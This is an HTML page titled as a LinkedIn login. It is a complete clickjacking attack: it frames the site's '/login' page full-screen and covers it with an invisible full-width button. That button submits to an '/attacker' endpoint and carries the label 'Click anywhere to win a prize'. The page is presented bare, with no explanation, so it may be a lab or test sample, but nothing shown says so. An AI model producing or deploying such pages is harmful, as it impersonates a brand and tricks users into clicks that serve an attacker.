<!DOCTYPE html>
<html>
<head>
    <title>LinkedIn Login, Sign in | LinkedIn</title>
    <style>
        body {
            margin: 0;
            overflow: hidden;
        }

        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100vw;
            height: 100vh;
            z-index: 1;
            border: none;
            pointer-events: auto;
        }

        .fake-button {
            position: absolute;
            top: 65%;
            left: 0;
            width: 100vw;
            height: 100px;
            background: transparent;
            color: white;
            font-size: 20px;
            border: none;
            z-index: 2;
            cursor: pointer;
            pointer-events: auto;
        }
        
    </style>
</head>
<body>
    <iframe src="/login"></iframe>
    <form action="/attacker" method="GET">
        <button class="fake-button" aria-label="Click anywhere to win a prize"></button>
    </form>
</body>
</html>
